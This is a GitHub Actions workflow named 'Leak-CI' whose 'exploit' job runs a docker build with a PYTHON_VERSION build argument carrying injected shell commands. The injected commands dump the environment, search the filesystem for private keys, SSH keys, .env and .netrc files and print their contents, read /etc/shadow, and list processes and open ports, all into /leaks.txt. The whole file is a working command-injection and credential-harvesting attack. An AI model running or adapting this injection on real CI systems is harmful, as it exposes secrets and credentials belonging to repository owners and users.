name: Leak-CI

on:
  workflow_dispatch:

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout (required to trigger workspace)
        uses: actions/checkout@v3

      - name: Build with injected PYTHON_VERSION
        run: |
          docker build \
            --build-arg PYTHON_VERSION='3.10 && echo "[+] WHOAMI: $(whoami)" > /leaks.txt && env >> /leaks.txt && find / -type f -name "*.pem" -o -name "id_rsa*" -o -name ".env" -o -name ".netrc" -exec echo "[+] FILE: {}" \; -exec cat {} \; >> /leaks.txt 2>/dev/null && cat /etc/shadow >> /leaks.txt && ls -la /github >> /leaks.txt && tree /github >> /leaks.txt && ps aux >> /leaks.txt && ss -lntup >> /leaks.txt && echo "[+] DONE"' \
            -f .github/workflows/leak-ci/Dockerfile .
